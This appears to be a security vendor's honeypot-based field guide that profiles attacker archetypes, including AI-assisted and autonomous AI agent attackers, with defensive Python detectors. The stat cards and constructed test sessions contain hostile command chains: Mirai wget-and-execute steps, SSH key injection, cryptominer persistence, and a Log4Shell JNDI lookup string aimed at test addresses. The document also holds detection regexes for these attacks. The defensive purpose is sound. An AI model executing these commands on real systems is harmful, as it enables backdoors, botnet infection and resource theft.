Threat Actor Field Guide

The Bestiary of Cyber Threats

This bestiary is drawn from observations of over 6 million events captured on live nodes during a two-week period in April 2026. It is a representation of the types of threats Deception Check can help identify. Every attacker is classified into an archetype and rated on six attributes on a 0 to 10 scale, with rarity tiers calculated from how often each archetype is seen across the fleet.

Legendary (2)  ·  Rare (5)  ·  Uncommon (3)  ·  Common (1)

🕷️ RAT Operator

Level 11 Necromancer
Neutral Evil
Encounter Rate: 1 in 8,887
🟧 Legendary
"The Puppeteer. Remote Access Trojans give them persistent, stealthy control. IRC channels become command centers, reverse shells become puppet strings. They don't just break in — they move in."
Capability: 7 · Aggression: 5 · Speed: 4 · Knowledge: 6 · Adaptability: 6 · Lethality: 5

Signature Move

IRC PRIVMSG → DDoS command dispatch across thousands of zombies

Weakness

IRC C2 takedowns, behavioral detection of C2 beaconing, egress filtering

Famous Examples

  • Outlaw Gang (Perl-based)
  • XorDDoS operators
  • ChinaZ DDoS crew
  • ShellBot campaigns

Loot Dropped

Persistent backdoor access, DDoS-for-hire capacity, credential dumps

IPs Observed: 1 · Share of All Attackers: 0.0% · Rarity Tier: Legendary

🤖 AI-Assisted Attacker

Level 16 Wizard
Lawful Evil
Encounter Rate: 1 in 2,962
🟧 Legendary
"The Augmented. Human intent amplified by LLM co-pilots. Their commands are grammatically perfect, contextually appropriate, and arrive at suspiciously consistent intervals. No typos. No hesitation. They ask the AI what to do next, and it tells them — faster than any human could plan alone."
Capability: 9 · Aggression: 5 · Speed: 6 · Knowledge: 9 · Adaptability: 8 · Lethality: 8

Signature Move

Perfectly structured recon chain with zero typos, 2-4 second intervals, context-aware pivots

Weakness

AI guardrails limiting truly novel attacks, behavioral analytics detecting too-perfect patterns

Famous Examples

  • ChatGPT-assisted pentesters (2023+)
  • Claude-powered red team operators
  • Copilot-aided exploit development
  • AI-generated phishing campaigns

Loot Dropped

Well-documented attack paths, AI-generated exploit code, automated reporting

IPs Observed: 3 · Share of All Attackers: 0.0% · Rarity Tier: Legendary

🔑 Credential-Spray Bot

Level 6 Rogue
Neutral Evil
Encounter Rate: 1 in 168
🟦 Rare
"Patient and relentless, the Credential Sprayer cycles through thousands of username:password pairs harvested from breaches and default firmware lists. They don't pick locks — they try every key on the ring until one fits."
Capability: 4 · Aggression: 6 · Speed: 7 · Knowledge: 4 · Adaptability: 2 · Lethality: 3

Signature Move

61-password IoT default blitz in under 30 seconds

Weakness

Account lockouts, fail2ban, key-only SSH auth

Famous Examples

  • Mirai's original credential list (61 pairs)
  • Hydra botnets
  • THC-Hydra operators
  • Medusa brute-force campaigns

Loot Dropped

Valid credential pairs for lateral movement

IPs Observed: 53 · Share of All Attackers: 0.6% · Rarity Tier: Rare
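
A minimal burst detector for this pattern, added here as an example (it is not Deception Check code): it counts distinct username:password pairs per source IP inside a 30-second sliding window and raises one alert per source the moment the count first crosses a threshold. The 30-second window and the 20-pair threshold are illustrative assumptions, and the sample events are constructed with RFC 5737 test addresses.

```python
"""Credential-spray burst detector.

Added example, not Deception Check code.  Counts distinct username:password
pairs per source IP inside a sliding window and raises one alert per source
at the moment the count first crosses the threshold.  Window and threshold
are illustrative assumptions; the sample events are constructed.
"""
from collections import defaultdict, deque

WINDOW_SECONDS = 30.0   # assumption: the card's "under 30 seconds" blitz window
PAIR_THRESHOLD = 20     # assumption: distinct pairs inside the window that trip an alert


def detect_spray(events, window=WINDOW_SECONDS, threshold=PAIR_THRESHOLD):
    """events: time-ordered iterable of (timestamp, src_ip, username, password).

    Returns {src_ip: (alert_time, distinct_pairs_in_window)} for every source
    that reaches `threshold` distinct pairs within `window` seconds.  A source
    is reported once, at the first crossing, so the caller can act on it then.
    """
    recent = defaultdict(deque)   # src_ip -> deque of (timestamp, (user, pw))
    alerts = {}
    for ts, src, user, pw in events:
        q = recent[src]
        q.append((ts, (user, pw)))
        # Drop attempts that have fallen out of the window.
        while q and ts - q[0][0] > window:
            q.popleft()
        distinct = {pair for _, pair in q}
        if len(distinct) >= threshold and src not in alerts:
            alerts[src] = (ts, len(distinct))
    return alerts


def constructed_events():
    """Constructed sample traffic (RFC 5737 test addresses, not real observations)."""
    events = []
    # Sprayer: 40 different pairs, one every 0.5 s -> reaches 20 pairs at t=109.5.
    for i in range(40):
        events.append((100.0 + 0.5 * i, "203.0.113.7", f"user{i}", f"pw{i}"))
    # Slow guesser: a new pair every 10 s, never more than 4 pairs in any window.
    for i in range(30):
        events.append((100.0 + 10.0 * i, "198.51.100.9", f"u{i}", f"p{i}"))
    # Legitimate user fumbling the same password three times: one pair, no alert.
    for i in range(3):
        events.append((105.0 + i, "192.0.2.5", "alice", "hunter2"))
    events.sort(key=lambda e: e[0])
    return events


if __name__ == "__main__":
    for src, (when, n) in detect_spray(constructed_events()).items():
        print(f"spray from {src}: {n} distinct pairs by t={when}")
```

Counting distinct pairs rather than raw failures is what separates the sprayer from a legitimate user retrying one password; the ban action itself (fail2ban, a lockout) is deliberately left out so the detector can be wired to whatever the deployment uses.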

🕸️ Web Exploit Scanner

Level 8 Monk
Neutral Evil
Encounter Rate: 1 in 135
🟦 Rare
"Swift and methodical, the Web Exploit Scanner throws hundreds of known CVE paths at every HTTP endpoint it finds. phpunit eval-stdin, .env files, Log4Shell JNDI strings, Spring4Shell class loaders — each request a precisely aimed strike at a known weakness."
Capability: 6 · Aggression: 7 · Speed: 9 · Knowledge: 6 · Adaptability: 3 · Lethality: 5

Signature Move

50+ phpunit path permutations in a single burst, then .env file harvesting

Weakness

WAFs with virtual patching, up-to-date dependencies

Famous Examples

  • Nuclei-based scanners
  • Zgrab campaigns
  • Log4Shell mass-exploitation wave (Dec 2021)
  • ThinkPHP botnet
  • Spring4Shell spray (2022)

Loot Dropped

Exposed credentials from .env files, RCE shells, cloud API keys

IPs Observed: 66 · Share of All Attackers: 0.7% · Rarity Tier: Rare
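
A signature matcher for the four request families named on this card, added as an example (not Deception Check code): it parses combined-format access-log lines, checks each against a small illustrative regex set (the regexes are the editor's assumptions, not a complete ruleset), and groups hits per source so a burst across several families stands out. The log lines are constructed samples using RFC 5737 test addresses.

```python
"""Web-scanner signature matcher over HTTP access-log lines.

Added example, not Deception Check code.  The four signature families are the
ones named in the card above; the regexes are a minimal illustrative set, not
a complete ruleset, and the log lines are constructed samples.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

SIGNATURES = {
    "phpunit-eval-stdin": re.compile(r"/phpunit/.*eval-stdin\.php", re.I),
    "dotenv-harvest":     re.compile(r"/\.env(?:\.\w+)?(?=[\s?\"]|$)", re.I),
    "log4shell-jndi":     re.compile(r"\$\{jndi:", re.I),
    "spring4shell":       re.compile(r"class\.module\.classLoader", re.I),
}

# Apache/nginx combined format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(line):
    """Return (src_ip, [signature names]) for one log line, or (None, []) if unparseable.

    Signatures are checked against the raw line (so a JNDI string in the
    User-Agent field still counts) and against the percent-decoded target
    (so /%2Eenv is seen as /.env)."""
    m = LOG_RE.match(line)
    if not m:
        return None, []
    haystacks = (line, unquote(m.group("target")))
    hits = [name for name, rx in SIGNATURES.items()
            if any(rx.search(h) for h in haystacks)]
    return m.group("ip"), hits


def summarize(lines, min_families=1):
    """Per-source counts of signature hits, keeping sources that touched at least
    `min_families` distinct families (a burst across families is the scanner tell)."""
    per_ip = defaultdict(Counter)
    for line in lines:
        ip, hits = classify_request(line)
        for h in hits:
            per_ip[ip][h] += 1
    return {ip: dict(c) for ip, c in per_ip.items() if len(c) >= min_families}


# Constructed sample log (RFC 5737 test addresses; not real traffic).
SAMPLE_LOG = [
    '203.0.113.9 - - [10/Apr/2026:12:00:01 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "python-requests/2.31"',
    '203.0.113.9 - - [10/Apr/2026:12:00:01 +0000] "GET /.env HTTP/1.1" 404 153 "-" "python-requests/2.31"',
    '203.0.113.9 - - [10/Apr/2026:12:00:02 +0000] "GET /.env.bak HTTP/1.1" 404 153 "-" "python-requests/2.31"',
    '203.0.113.9 - - [10/Apr/2026:12:00:02 +0000] "GET /%2Eenv HTTP/1.1" 404 153 "-" "python-requests/2.31"',
    '203.0.113.9 - - [10/Apr/2026:12:00:03 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.9/x}"',
    '198.51.100.4 - - [10/Apr/2026:12:05:10 +0000] "POST /?class.module.classLoader.x=1 HTTP/1.1" 400 0 "-" "curl/8.0"',
    '192.0.2.10 - - [10/Apr/2026:12:07:00 +0000] "GET /index.html HTTP/1.1" 200 1042 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, families in summarize(SAMPLE_LOG, min_families=2).items():
        print(ip, families)
```

Decoding the target before matching matters: a scanner that percent-encodes `.env` slips past a raw-string rule, and the same decoding step is what a WAF's virtual-patching rule (this card's listed weakness) has to do before it can block the request.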

⛏️ Cryptominer Operator

Level 9 Artificer
Neutral Evil
Encounter Rate: 1 in 254
🟦 Rare
"The Prospector doesn't destroy — they extract. After gaining access, they immediately survey the hardware: nvidia-smi for GPUs, lscpu for cores, free -m for RAM. If the specs are right, they deploy XMRig pointing at their Monero pool and vanish — leaving only elevated electricity bills and degraded performance."
Capability: 7 · Aggression: 4 · Speed: 5 · Knowledge: 7 · Adaptability: 6 · Lethality: 2

Signature Move

nvidia-smi -q → lscpu → nproc → deploy xmrig → set crontab persistence → kill competing miners

Weakness

Process monitoring, CPU usage alerts, egress filtering on stratum ports

Famous Examples

  • TeamTNT
  • Kinsing / Kdevtmpfsi
  • Outlaw (Perl-based)
  • WatchDog
  • 8220 Gang
  • Rocke Group

Loot Dropped

Monero (XMR) cryptocurrency, pool statistics revealing operator wallet

IPs Observed: 35 · Share of All Attackers: 0.4% · Rarity Tier: Rare

🧑‍💻 Human Attacker

Level 14 Fighter
Chaotic Neutral
Encounter Rate: 1 in 185
🟦 Rare
"Fingers on keyboard, brain engaged. The Human Attacker reads error messages, adjusts their approach, explores directories, and makes decisions. They might mistype 'sl' instead of 'ls' — that's how you know they're real. Irregular timing, creative pivots, genuine curiosity about what's on the box."
Capability: 8 · Aggression: 6 · Speed: 3 · Knowledge: 8 · Adaptability: 9 · Lethality: 7

Signature Move

whoami → uname -a → cat /etc/passwd → ls /home → find / -name '*.conf' — genuine exploration

Weakness

Honeypot deception (they trust what they see), EDR behavioral detection, session recording

Famous Examples

  • APT28 (Fancy Bear) operators
  • Lazarus Group hands-on-keyboard
  • LAPSUS$ teenage hackers
  • Individual bug bounty hunters gone rogue

Loot Dropped

Targeted intelligence, custom tools, unpredictable lateral movement

IPs Observed: 48 · Share of All Attackers: 0.5% · Rarity Tier: Rare

🦾 Agentic Attacker

Level 18 Construct (Golem)
True Neutral
Encounter Rate: 1 in 1,777
🟦 Rare
"No human in the loop. The Agentic Attacker is a fully autonomous system — an AI agent with tools, memory, and objectives. It scans, exploits, escalates, and exfiltrates without ever pausing for human approval. Sub-second decision loops. Zero emotional tells. The future of offensive security, and it's already here."
Capability: 9 · Aggression: 7 · Speed: 10 · Knowledge: 8 · Adaptability: 7 · Lethality: 9

Signature Move

0.2-second inter-command gaps, 8+ unique commands, zero typos, systematic enumeration patterns no human would execute that cleanly

Weakness

Brittle against unexpected environments, can be fingerprinted by timing analysis, easily confused by honeypot deception

Famous Examples

  • PentestGPT autonomous mode
  • AutoSploit
  • DARPA Cyber Grand Challenge bots
  • Hypothetical: Claude-as-red-team-agent
  • AI worms (proof of concept, 2024)

Loot Dropped

Complete automated attack reports, zero-day chains, reproducible exploit playbooks

IPs Observed: 5 · Share of All Attackers: 0.1% · Rarity Tier: Rare
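
The AI-Assisted, Human and Agentic cards above all separate operator types by the same tells: inter-command timing, timing regularity, and typos. The classifier below, added as an example (not Deception Check code), turns a honeypot session into those three features and applies thresholds modelled on the cards' descriptions; the command vocabulary used to count typos and the exact thresholds are the editor's assumptions, and the three sessions are constructed.

```python
"""Operator-type classifier from honeypot session timing and typos.

Added example, not Deception Check code.  It turns the tells described in the
AI-Assisted, Human and Agentic cards into three features per session (mean
inter-command gap, gap regularity, typo count) and applies illustrative
thresholds.  The command vocabulary and thresholds are assumptions; the sample
sessions are constructed.
"""
import statistics

# Assumption: a small vocabulary of first tokens seen in recon sessions.  Any
# first token outside it (e.g. "sl" for "ls") is counted as a typo.
KNOWN_COMMANDS = {
    "whoami", "id", "uname", "cat", "ls", "find", "ps", "free", "nproc",
    "lscpu", "df", "ip", "ss", "netstat", "cd", "echo", "wget", "curl", "exit",
}


def features(session):
    """session: list of (timestamp_seconds, command_line) in order of arrival."""
    times = [t for t, _ in session]
    cmds = [c for _, c in session]
    gaps = [b - a for a, b in zip(times, times[1:])]
    mean_gap = statistics.fmean(gaps) if gaps else 0.0
    # Coefficient of variation: near 0 for machine-regular timing, large for a human.
    cv = statistics.pstdev(gaps) / mean_gap if len(gaps) > 1 and mean_gap > 0 else 0.0
    firsts = [c.split()[0] for c in cmds if c.strip()]
    typos = sum(1 for f in firsts if f not in KNOWN_COMMANDS)
    return {
        "commands": len(cmds),
        "unique": len(set(cmds)),
        "mean_gap": mean_gap,
        "cv": cv,
        "typos": typos,
    }


def classify(session):
    """Return (label, features).  Thresholds are illustrative assumptions
    modelled on the cards: agentic = sub-second gaps, 8+ unique commands, no
    typos; ai-assisted = 2-4 s gaps with very low variance and no typos;
    human = typos or irregular timing."""
    f = features(session)
    if f["commands"] < 3:
        return "unclassified", f
    if f["typos"] == 0 and f["unique"] >= 8 and f["mean_gap"] <= 0.5:
        return "agentic", f
    if f["typos"] == 0 and 2.0 <= f["mean_gap"] <= 4.0 and f["cv"] <= 0.25:
        return "ai-assisted", f
    if f["typos"] > 0 or f["cv"] > 0.5:
        return "human", f
    return "unclassified", f


# Constructed sessions.
HUMAN_SESSION = [
    (0.0, "whoami"), (4.1, "uname -a"), (13.7, "sl"), (15.2, "ls"),
    (31.0, "cat /etc/passwd"), (47.6, "ls /home"),
]
AI_ASSISTED_SESSION = [
    (0.0, "whoami"), (3.0, "uname -a"), (6.1, "id"), (9.0, "cat /etc/passwd"),
    (12.1, "ls /home"), (15.0, "ps aux"), (18.0, "free -m"), (21.1, "ip a"),
]
AGENTIC_SESSION = [
    (round(0.2 * i, 1), c) for i, c in enumerate([
        "whoami", "id", "uname -a", "cat /etc/passwd", "ls /home",
        "ps aux", "nproc", "free -m", "df -h", "ss -tlnp",
    ])
]

if __name__ == "__main__":
    for name, s in [("human", HUMAN_SESSION), ("ai", AI_ASSISTED_SESSION), ("agent", AGENTIC_SESSION)]:
        label, f = classify(s)
        print(f"{name}: {label}  mean_gap={f['mean_gap']:.2f}s cv={f['cv']:.2f} typos={f['typos']}")
```

The regularity feature (coefficient of variation of the gaps) is what carries the "suspiciously consistent intervals" tell; mean gap alone cannot tell a patient human from an LLM-paced session, and a typo anywhere in the stream overrides the timing verdict because no model-driven loop produces `sl`.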

🔭 Known Scanner

Level 5 Ranger
Lawful Neutral
Encounter Rate: 1 in 49
🟩 Uncommon
"The cartographers of cyberspace. They map every port, banner, and certificate across the entire IPv4 range — not to attack, but to illuminate. Their scans are disclosed, their intent transparent, their User-Agent strings polite."
Capability: 3 · Aggression: 2 · Speed: 9 · Knowledge: 8 · Adaptability: 3 · Lethality: 1

Signature Move

Full IPv4 port sweep in under 45 minutes

Weakness

Blocklists and rate limiters immediately neutralize them

Famous Examples

  • Censys (University of Michigan)
  • Shodan (John Matherly)
  • Shadowserver Foundation
  • ONYPHE
  • Palo Alto Xpanse
  • BinaryEdge

Loot Dropped

Internet-wide scan datasets, research papers

IPs Observed: 180 · Share of All Attackers: 2.0% · Rarity Tier: Uncommon

🐛 Mirai / IoT Botnet

Level 12 Warlock (Swarm Patron)
Chaotic Evil
Encounter Rate: 1 in 23
🟩 Uncommon
"The Hive Mind. Born from the original Mirai source code leak in 2016, its variants now number in the thousands. Each infected device becomes a drone — scanning, brute-forcing, and DDoSing on command. The busybox echo fingerprint is its battle cry."
Capability: 7 · Aggression: 9 · Speed: 8 · Knowledge: 3 · Adaptability: 5 · Lethality: 7

Signature Move

enable → system → shell → sh → busybox echo \\xNN tag → wget C2 → chmod +x → execute for all 12 architectures

Weakness

Firmware updates, changed default passwords, network segmentation

Famous Examples

  • Mirai (Anna-senpai / Paras Jha)
  • Mozi
  • Echobot
  • Satori / Okiru
  • InfectedSlurs
  • MANGA/Dark

Loot Dropped

DDoS-for-hire capacity, proxy networks, crypto mining rigs

IPs Observed: 388 · Share of All Attackers: 4.4% · Rarity Tier: Uncommon

🗝️ SSH Key Injector

Level 10 Assassin
Lawful Evil
Encounter Rate: 1 in 31
🟩 Uncommon
"Silent and methodical. The SSH Key Injector doesn't ransack the system — they plant a backdoor. cd ~ → rm -rf .ssh → mkdir .ssh → echo 'ssh-rsa AAAA...' >> authorized_keys → chmod go= .ssh. One key, permanent access. They'll be back."
Capability: 8 · Aggression: 3 · Speed: 6 · Knowledge: 7 · Adaptability: 7 · Lethality: 6

Signature Move

chattr -ia .ssh → rm → mkdir → inject RSA key → chmod 700 — all in under 2 seconds

Weakness

Immutable authorized_keys, key-based auth with agent forwarding disabled, file integrity monitoring

Famous Examples

  • FritzFrog P2P botnet
  • RapperBot
  • Outlaw SSH worm
  • Ebury (Operation Windigo)
  • Chaos RAT operators

Loot Dropped

Persistent backdoor access, lateral movement capability across the network

IPs Observed: 283 · Share of All Attackers: 3.2% · Rarity Tier: Uncommon
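
The signature moves of the Cryptominer Operator, Mirai / IoT Botnet and SSH Key Injector cards are all ordered command chains, so one matcher serves all three. The block below is an added example (not Deception Check code): each playbook is the card's chain written as a list of step regexes, and a session matches when every step occurs in order somewhere in its command stream, with unrelated commands allowed in between. The regexes are the editor's assumptions and the sample sessions are constructed (TEST-NET address, placeholder key material).

```python
"""Ordered command-chain matcher for the signature moves of three archetypes.

Added example, not Deception Check code.  Each playbook is the ordered list
of steps from the Cryptominer Operator, Mirai / IoT Botnet and SSH Key
Injector cards, written as regexes; a session matches a playbook when every
step appears, in order, somewhere in its command stream (gaps allowed).
The regexes and the sample sessions are assumptions/constructions.
"""
import re

PLAYBOOKS = {
    # Cryptominer card: hardware survey -> miner -> crontab persistence
    "cryptominer-survey": [r"^nvidia-smi", r"^lscpu", r"^nproc", r"xmrig", r"^crontab"],
    # Mirai card: shell unlock chain ending in the busybox echo tag
    "mirai-busybox-tag": [r"^enable$", r"^system$", r"^shell$", r"^sh$", r"busybox echo"],
    # SSH Key Injector card: wipe and recreate ~/.ssh, append a key, lock permissions
    "ssh-key-inject": [
        r"^rm .*\.ssh", r"^mkdir .*\.ssh",
        r"ssh-rsa AAAA.*authorized_keys", r"^chmod (700|go=) .*\.ssh",
    ],
}


def match_playbook(commands, steps):
    """Greedy in-order subsequence match.

    Returns the index of the command that satisfied each step, or None if some
    step never occurs after the command that satisfied the previous step."""
    idx, hits = 0, []
    for step in steps:
        rx = re.compile(step)
        while idx < len(commands) and not rx.search(commands[idx]):
            idx += 1
        if idx == len(commands):
            return None
        hits.append(idx)
        idx += 1
    return hits


def classify_session(commands):
    """Map every playbook name that matches to the command indices it matched on."""
    result = {}
    for name, steps in PLAYBOOKS.items():
        hits = match_playbook(commands, steps)
        if hits is not None:
            result[name] = hits
    return result


# Constructed sessions (RFC 5737 test address, placeholder key material).
MINER_SESSION = [
    "nvidia-smi -q", "lscpu", "nproc", "free -m",
    "wget http://203.0.113.5/x.tar.gz", "tar xf x.tar.gz",
    "./xmrig -o 203.0.113.5:3333", "crontab -l", "pkill -f kinsing",
]
MIRAI_SESSION = ["enable", "system", "shell", "sh", "/bin/busybox echo -e '\\x4d\\x49'"]
SSH_SESSION = [
    "cd ~", "chattr -ia .ssh", "rm -rf .ssh", "mkdir .ssh",
    "echo 'ssh-rsa AAAA<placeholder>' >> .ssh/authorized_keys", "chmod go= .ssh",
]
BENIGN_SESSION = ["whoami", "ls -la", "cat .ssh/authorized_keys", "exit"]

if __name__ == "__main__":
    for label, s in [("miner", MINER_SESSION), ("mirai", MIRAI_SESSION),
                     ("ssh", SSH_SESSION), ("benign", BENIGN_SESSION)]:
        print(label, classify_session(s))
```

Matching an ordered subsequence rather than individual commands is the point: `cat .ssh/authorized_keys` or a lone `nproc` is routine administration, while survey-then-drop-then-persist, or wipe-then-recreate-then-append, is the archetype. The step indices returned let an analyst jump straight to the matching lines in a session recording.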

🪰 Nuisance Scanner

Level 1 Commoner
Chaotic Neutral
Encounter Rate: 1 in 1
⬜ Common
"The background radiation of the Internet. Single SYN packets flung at random IPs, connection resets before the banner even loads. They exist in the billions, accomplish nothing individually, and waste everyone's log storage."
Capability: 1 · Aggression: 1 · Speed: 5 · Knowledge: 1 · Adaptability: 1 · Lethality: 0

Signature Move

SYN → RST in under 200ms, never to return

Weakness

Literally everything. A closed port stops them.

Famous Examples

  • ZMap background noise
  • Residential botnet probes
  • Masscan leftovers
  • Misconfigured monitoring tools

Loot Dropped

Nothing. Not even a complete TCP handshake.

IPs Observed: 7,825 · Share of All Attackers: 88.0% · Rarity Tier: Common

© 2026 Deception Check, Inc. Patent Pending. deceptioncheck.ai